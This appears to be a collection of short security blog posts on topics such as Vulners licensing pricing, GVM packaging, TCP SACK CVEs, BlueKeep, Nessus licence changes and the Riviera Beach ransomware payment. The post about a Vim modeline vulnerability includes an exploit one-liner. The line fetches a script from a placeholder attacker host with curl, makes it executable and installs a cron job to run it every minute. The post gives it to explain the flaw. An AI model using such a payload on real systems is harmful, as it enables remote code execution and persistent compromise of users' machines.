I often hear from employees of large companies that they use Vulners for Vulnerability Management because it's toll free. Well, strictly speaking, it is not.

In the footer of each Vulners.com page there is a link to EULA. According to it, it's free for personal, education or research use. If you use Vulners at work to monitor your infrastructure or to get information about vulnerabilities, this is a commercial usage and you have to pay.

How much? It's better to request the latest details from [email protected]. But currently the price starts from $150/month WITHOUT API usage and from $500/month for 10000 API calls. For $1000/month you can use Vulners API without any restrictions.

Is this a lot? $6000/year ($500/month) is about twice as much as the price of Nessus Professional. But comparing with other enterprises Vulnerability Management solutions it's not really so much. For example, it's the price of Tenable.io for only 155 hosts. With Vulners Linux API and some optimization, that I will describe later, it would be possble to cover MUCH more hosts and easily asses them on a daily basis.

What if you want use Vulners API for commercial purposes, but don't need so many API calls? Well, strictly speaking, such using without commercial license would be a violation. But you will not be baned if you use <1000 request per month. And, in general, Vulners Team is loyal, doesn't ban such usage during the PoC, etc. Everything is discussable. But if you can pay, there is no reson why you shouldn't. Vulners is a small self-financing startup that does a lot of work with with very limited resources. Commercial licenses really help to pay servers and motivate the team to move on. 😉

A little bit about the things I did on the weekend. I am still struggling with Ubuntu Linux packages for #OpenVAS10 (now the project is officially called GVM10). Actually, I already made the scripts that generate packages from the sources as a part of my Packabit project and generated the packages. But I still can't run GVM from them, openvassd in particular. I assume problems with redis config, but maybe there is something else. If suddenly someone wants to give it a try and help with debugging - welcome 😉

GVM will be installed very quickly, in just a few minutes, and all GVM components can be managed comfortably with the services. New HTML5 interface is MUCH faster and better. 😉

This latest Vim vulnerability is pretty cute. Technically, when user opens malformed file with vim, he executes some bash script. This script can download something malicious, for example a cryptolocker, and then can add some cron job to execute it at a convinient time. Anything!

For example,

echo ':!curl "https://dangerous-site.com/very_dangerous_script.sh" > /tmp/malscript.sh; chmod +x /tmp/malscript.sh; crontab -l > mycron; echo "* * * * * /tmp/malscript.sh" >> mycron; crontab mycron; rm mycron||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="' > test.txt

The only problem is that "Debian, Ubuntu, Gentoo, OSX, etc. by default disable modelines for security reasons". 😉 So, it makes this vulnerability practically unexploitable in a real life.

To check it in Ubuntu I needed to

sudo vim /etc/vim/vimrc
...
set modeline
set modelines=5
...

I couldn't make it work with current #Vim version in #CentOS 7.6.1810 with modeline set. 😟 Probably because the version is too old "VIM - Vi IMproved 7.4". soji256 also couldn't run it in CentOS. So, it seems that to be successfully attacked the target CentOS user should install Vim from sources, but not the last version, for example this one (I haven't check it), and use it with modeline enabled. This is probably pretty rare combination. 🙂 But if you could run it with default CentOS Vim, please let me know at @leonov_av, I'm curious 😉

I usually don't write about politics here, but the latest scandal about US cyber attacks on Russian Power Grid is pretty hilarious. OMG, who would have thought that Americans can do such creepy offensive stuff?! What a shock! 😏 What is the most interesting, The New York Times writes about it, not RT or Sputnik. Now, according to mr. president journalists or this newspaper "committed treason" and at the same time it's "also, not true". BTW, I thought calling citizens "the enemy of the people" is something from the Soviet era. In which direction are you guys moving? 🙂

Joking aside, I find It quite sick and dangerous. 😐 I don't like the rhetoric that if State A makes attacks on critical infrastructure of State B (first of all, what are the proofs? accurate attack attributions is almost impossible nowadays), State B should do the same with State A using undisclosed vulnerabilities and backdoors. It's not "equivalent of land mines" at all, it's a full scaled offensive operation. At a minimum, this leads to the fragmentation of global IT and InfoSecurity market and escalate the witch-hunt (#ERPScan, #Kaspersky, #Huawei, whatever next). Just because you can no longer trust foreign vendors. Less competition means lower product quality and higher prices for the customers.

Yay. Now it's official: TCP SACK PANIC - Kernel vulnerabilities

CVE-2019-11477 - A sequence of SACKs may be crafted such that one can trigger an integer overflow, leading to a kernel panic.
CVE-2019-11478 - It is possible to send a crafted sequence of SACKs which will fragment the TCP retransmission queue.
CVE-2019-11479 - An attacker can force the Linux kernel to segment its responses into multiple TCP segments, each of which contains only 8 bytes of data. This drastically increases the bandwidth required to deliver the same amount of data.

Disable SACK processing (/proc/sys/net/ipv4/tcp_sack set to 0) or install patches! 😉 Pretty simple DoS-exploits for these vulnerabilities should appear soon...
#TCPSACKPANIC #Linux #Kernel #SACK

30 days have passed since the poll, and NO massive cyber attack based on #BlueKeep vulnerability occurred. What conclusions can we draw?

Well, it is very difficult to predict a real exploitability potential of the vulnerability based only on it's description. Even if it is RCE, even if the well-known vendors confirmed that they were able to write an exploit (but did not publish it), this does not guarantee that the vulnerability will be widely used in cyber attacks soon and so you should give it a highest priority in remediation.

That does not exclude the possibility that RCE exploit for this vulnerability can be currently used in highly focused attacks, and the real action will occur with the leak of this exploit. Will it happen tomorrow? Who knows.

Three days ago NASA published very interesting document "Cybersecurity Management and Oversight at the Jet Propulsion Laboratory". Most media outlets mentioned it as "#NASA was hacked using #RaspberryPi". Yes, this is true, you can find information about this incident in the document by "April 2018". But it's not even the most interesting part. There are many great and funny details about their CMDB-like system "Information Technology Security Database (ITSDB)", lack of network segmentation, unpathched vulnerabilities, etc. And all this in ordinary, not very formal language. It seems like a good example how Information Security should be and should NOT be managed in a big organization and an awesome weekend reading. 😊

A great set of Software Development tips "Things I Learnt The Hard Way (in 30 Years of Software Development)". The blog is about .Net and TDD (test-driven development), but the tips are quite universal. I totally agree with everything that I have read there, especially with the tips related to documentation and "be ready to throw your code away[...] Your code is not a wall: if you have to throw it always, it is not wasted material. Surely it means your time writing code was lost, but you got a better understanding about the problem now." I think such things should be taught in schools. It's really important for the right mindset.

I did not find this on Tenable’s website, only in the blog post of the Russian distributor, but it seems that Nessus Professional 8.5, that will be released tomorrow, will behave differently after the license expiration. On the first day it will switch off all the scanning capabilities and plugin updates. Then within 30 days there will be an option to download existing scan results. After that all functions will be blocked. This is not good news because now any delay in license renewal, which happens in large organizations, will break the whole Vulnerability Management process completely.

The new price will be $2.390 per year, $2.190 for the renewal. There will also be small discounts for those who order licenses for 2 and 3 years (2.5% and 5%).

Currently my favorite city in the USA is Riviera Beach, Florida. 🙂 The story is wonderful (pastebin for those who have problems with access to the site). The city administration was paralyzed by #cryptolocker, because some employee of the local police department clicked on malicious link in email. And of course there were no backups. The situation is ordinary. But the decision is rather unusual, the city council decided to pay ransom $ 600,000 in Bitcoins to get their data back. Without any guarantee that the data will be decrypted and against the direct recommendations of the FBI.

There are no technical details, but if multiple servers were affected there should be problems with network segmentation and unpatched servers (probably, the lack of MS17-010 patch). But none of these problems were mentioned in media. In the media, consil representatives say they need to buy new desktops, laptops and backup system. With such attitude, it probably won't be the last time they encounter such problems. 😏

And, of course, the most intriguing is whether or not they will pay the ransom and get the decryption key. If they spend so much money for nothing, it will be legendary! 🤩

PS: An interesting fact is that they actually bought a new backup system before the incident for $798,419, but it was not deployed on time. 😉 #ransomware

Vulnerability detection plugin vulners.nse is now part of the Nmap. The most famous network scanner in the world! Officially! It took two years since the initial plugin release. Congratulations to the #Vulners Team! Great job!

Everything that I wrote earlier about the new behavior of #Nessus 8.5 after the license expiration, turned out to be true.

#Tenable also edited the GUI a little bit. They separated Report (HTML and CSV) and Export (Nessus v2 XML and Nessus DB). Now you can make report for selected hosts or vulnerabilities in more natural way. They also added these cool buttons to the scan results pages (it may be added some versions before, but I didn’t notice): you can snooze a vulnerability for some time, edit it's criticality or even delete entire host from the scan. And all this you can do for several selected vulnerabilities and hosts. Pretty cool.

They also switched off the limits for Host Discovery scans in Nessus Pro Eval and Nessus Essentials (!!). Well, for Nessus Pro Eval it's not so great, because we remember the time when there were no limits in trial version at all. 😉 But it makes free Nessus Essentials much more useful for organizations.

A few words about the Reuters "Yandex was hacked" article.

1. It is rather sad that modern journalistic investigation may be based on some information from 4 anonymous sources without any proofs. Thy only interesting details are: Western intelligence (yep, once again) as an attacker, Regin malware as a tool, network access for several weeks as a result, user authentication methods in Yandex Email service as a goal. The representative of Yandex responded like "there was an attack at the end of 2018, but our IT security guys successfully dealt with it". So, there is nothing to discuss in any serious way.